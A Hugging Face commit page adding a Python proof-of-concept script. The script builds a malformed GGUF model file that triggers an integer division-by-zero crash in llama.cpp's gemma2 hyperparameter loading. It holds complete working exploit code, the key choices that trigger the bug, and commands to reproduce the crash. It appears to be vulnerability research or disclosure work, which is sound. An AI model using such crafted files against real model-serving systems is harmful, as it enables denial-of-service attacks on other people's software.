salvepilo commited on
Commit
ebf72e8
·
verified ·
1 Parent(s): 6366b5a

Upload poc_gemma2_divzero.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc_gemma2_divzero.py +178 -0
poc_gemma2_divzero.py ADDED
@@ -0,0 +1,178 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Integer division-by-zero (SIGFPE / UB) in llama.cpp gemma2 architecture loading.
4
+
5
+ Vulnerability: In src/llama-model.cpp, the LLM_ARCH_GEMMA2 handler computes:
6
+
7
+ hparams.f_attention_scale = type == LLM_TYPE_27B
8
+ ? 1.0f / std::sqrt(float(hparams.n_embd / hparams.n_head(0)))
9
+ : 1.0f / std::sqrt(float(hparams.n_embd_head_k));
10
+
11
+ When n_layer == 46, the type is set to LLM_TYPE_27B, so the first branch is taken.
12
+ If the `attention.head_count` key is omitted from the GGUF file, the n_head_arr
13
+ stays filled with 0s (from std::fill at line 552), so n_head(0) returns 0.
14
+ This makes `hparams.n_embd / hparams.n_head(0)` an integer division by zero.
15
+
16
+ The guard at line 606 (`if (hparams.n_head() > 0)`) only protects the
17
+ n_embd_head_k calculation, not the architecture-specific code at line 1347.
18
+
19
+ Platform behavior:
20
+ - x86_64: SIGFPE (hardware trap on integer division by zero), exit code 136
21
+ - ARM64: Silent undefined behavior (ARM SDIV returns 0 for div-by-zero),
22
+ but UBSan catches it and aborts with exit code 134
23
+
24
+ Attack vector:
25
+ 1. Set general.architecture = "gemma2"
26
+ 2. Set gemma2.block_count = 46 (triggers LLM_TYPE_27B)
27
+ 3. Set gemma2.embedding_length = 4096 (any non-zero value)
28
+ 4. Set gemma2.context_length = 8192 (required)
29
+ 5. Set gemma2.attention.layer_norm_rms_epsilon = 1e-6 (required for gemma2)
30
+ 6. OMIT gemma2.attention.head_count (this is loaded with required=false)
31
+ 7. n_head_arr stays all-zero => n_head(0) == 0 => division by zero
32
+
33
+ The crash occurs during load_hparams(), before vocab or tensor loading,
34
+ so no valid vocabulary or tensor data is needed.
35
+
36
+ Confirmed UBSan output:
37
+ src/llama-model.cpp:1347:61: runtime error: division by zero
38
+ SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/llama-model.cpp:1347:61
39
+ """
40
+
41
+ import struct
42
+ import os
43
+
44
+ # GGUF constants
45
+ GGUF_MAGIC = b"GGUF"
46
+ GGUF_VERSION = 3
47
+ GGUF_DEFAULT_ALIGNMENT = 32
48
+
49
+ # GGUF KV type constants
50
+ GGUF_TYPE_UINT32 = 4
51
+ GGUF_TYPE_FLOAT32 = 6
52
+ GGUF_TYPE_STRING = 8
53
+
54
+
55
+ def write_string(f, s):
56
+ """Write a GGUF string: uint64 length + chars (no null terminator)."""
57
+ encoded = s.encode('utf-8')
58
+ f.write(struct.pack('<Q', len(encoded)))
59
+ f.write(encoded)
60
+
61
+
62
+ def write_kv_string(f, key, value):
63
+ """Write a KV pair with string value."""
64
+ write_string(f, key)
65
+ f.write(struct.pack('<I', GGUF_TYPE_STRING))
66
+ write_string(f, value)
67
+
68
+
69
+ def write_kv_uint32(f, key, value):
70
+ """Write a KV pair with uint32 value."""
71
+ write_string(f, key)
72
+ f.write(struct.pack('<I', GGUF_TYPE_UINT32))
73
+ f.write(struct.pack('<I', value))
74
+
75
+
76
+ def write_kv_float32(f, key, value):
77
+ """Write a KV pair with float32 value."""
78
+ write_string(f, key)
79
+ f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
80
+ f.write(struct.pack('<f', value))
81
+
82
+
83
+ def create_gemma2_divzero_gguf(output_path):
84
+ """Create a GGUF file that triggers integer division-by-zero in gemma2 hparams loading.
85
+
86
+ The crash occurs in load_hparams() at the LLM_ARCH_GEMMA2 case, before
87
+ vocab or tensor loading. So we need:
88
+ - A valid GGUF v3 header
89
+ - The required KV pairs for gemma2 (but NOT attention.head_count)
90
+ - Zero tensors (the crash happens before tensors are loaded)
91
+ """
92
+
93
+ n_tensors = 0 # No tensors needed; crash is in hparams loading
94
+ n_kv = 5 # Number of KV pairs (see below)
95
+
96
+ with open(output_path, 'wb') as f:
97
+ # ===== GGUF Header =====
98
+ f.write(GGUF_MAGIC) # magic: "GGUF"
99
+ f.write(struct.pack('<I', GGUF_VERSION)) # version: 3
100
+ f.write(struct.pack('<Q', n_tensors)) # n_tensors: 0
101
+ f.write(struct.pack('<Q', n_kv)) # n_kv: 5
102
+
103
+ # ===== KV Pairs =====
104
+
105
+ # 1. general.architecture = "gemma2"
106
+ # This selects LLM_ARCH_GEMMA2 in load_arch().
107
+ write_kv_string(f, "general.architecture", "gemma2")
108
+
109
+ # 2. gemma2.context_length = 8192
110
+ # Required (loaded at line 517 with required=true).
111
+ write_kv_uint32(f, "gemma2.context_length", 8192)
112
+
113
+ # 3. gemma2.embedding_length = 4096
114
+ # Required (loaded at line 518 with required=true).
115
+ # Must be non-zero so that n_embd / n_head(0) is a non-trivial division.
116
+ write_kv_uint32(f, "gemma2.embedding_length", 4096)
117
+
118
+ # 4. gemma2.block_count = 46
119
+ # Required (loaded at line 520 with required=true).
120
+ # 46 layers triggers LLM_TYPE_27B at line 1341, which selects the
121
+ # vulnerable code path at line 1347 that divides by n_head(0).
122
+ write_kv_uint32(f, "gemma2.block_count", 46)
123
+
124
+ # 5. gemma2.attention.layer_norm_rms_epsilon = 1e-6
125
+ # Required for gemma2 (loaded at line 1334 with required=true).
126
+ # This must be present or load_hparams() throws before reaching line 1347.
127
+ write_kv_float32(f, "gemma2.attention.layer_norm_rms_epsilon", 1e-6)
128
+
129
+ # DELIBERATELY OMITTED: gemma2.attention.head_count
130
+ # This key is loaded at line 571 with required=false:
131
+ # ml.get_key_or_arr(LLM_KV_ATTENTION_HEAD_COUNT, hparams.n_head_arr, hparams.n_layer, false);
132
+ # When omitted, n_head_arr stays filled with 0s (from std::fill at line 552).
133
+ # Then at line 1347: hparams.n_embd / hparams.n_head(0) = 4096 / 0 => SIGFPE
134
+
135
+ # ===== Alignment padding =====
136
+ # Even with 0 tensors, pad to alignment boundary for spec compliance.
137
+ current_pos = f.tell()
138
+ aligned_pos = (current_pos + GGUF_DEFAULT_ALIGNMENT - 1) // GGUF_DEFAULT_ALIGNMENT * GGUF_DEFAULT_ALIGNMENT
139
+ if aligned_pos > current_pos:
140
+ f.write(b'\x00' * (aligned_pos - current_pos))
141
+
142
+ file_size = os.path.getsize(output_path)
143
+ print(f"[*] Created: {output_path}")
144
+ print(f"[*] File size: {file_size} bytes")
145
+ print(f"[*]")
146
+ print(f"[*] Vulnerability details:")
147
+ print(f"[*] Architecture: gemma2 (LLM_ARCH_GEMMA2)")
148
+ print(f"[*] block_count: 46 (triggers LLM_TYPE_27B)")
149
+ print(f"[*] embedding_length: 4096")
150
+ print(f"[*] head_count: OMITTED (stays 0 from std::fill)")
151
+ print(f"[*]")
152
+ print(f"[*] Crash location: src/llama-model.cpp:1347")
153
+ print(f"[*] hparams.n_embd / hparams.n_head(0)")
154
+ print(f"[*] = 4096 / 0")
155
+ print(f"[*] => integer division by zero (UB)")
156
+ print(f"[*]")
157
+ print(f"[*] Test with (x86_64 -- deterministic SIGFPE crash):")
158
+ print(f"[*] ./build/bin/llama-cli -m {output_path} -p 'hello'")
159
+ print(f"[*] Expected: SIGFPE, exit code 136")
160
+ print(f"[*]")
161
+ print(f"[*] Test with UBSan (any platform -- clean UB report):")
162
+ print(f"[*] cmake -B build-ubsan \\")
163
+ print(f"[*] -DCMAKE_C_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
164
+ print(f"[*] -DCMAKE_CXX_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
165
+ print(f"[*] -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=undefined' \\")
166
+ print(f"[*] -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=undefined' \\")
167
+ print(f"[*] -DGGML_METAL=OFF -DGGML_BLAS=OFF -DGGML_CUDA=OFF")
168
+ print(f"[*] cmake --build build-ubsan -j$(nproc)")
169
+ print(f"[*] ./build-ubsan/bin/llama-completion -m {output_path} -p 'hello'")
170
+ print(f"[*] Expected: 'runtime error: division by zero', exit code 134")
171
+
172
+
173
+ if __name__ == "__main__":
174
+ output_dir = "/Users/eltarne/Documents/script/gguf_poc"
175
+ os.makedirs(output_dir, exist_ok=True)
176
+
177
+ output_path = os.path.join(output_dir, "poc_gemma2_divzero.gguf")
178
+ create_gemma2_divzero_gguf(output_path)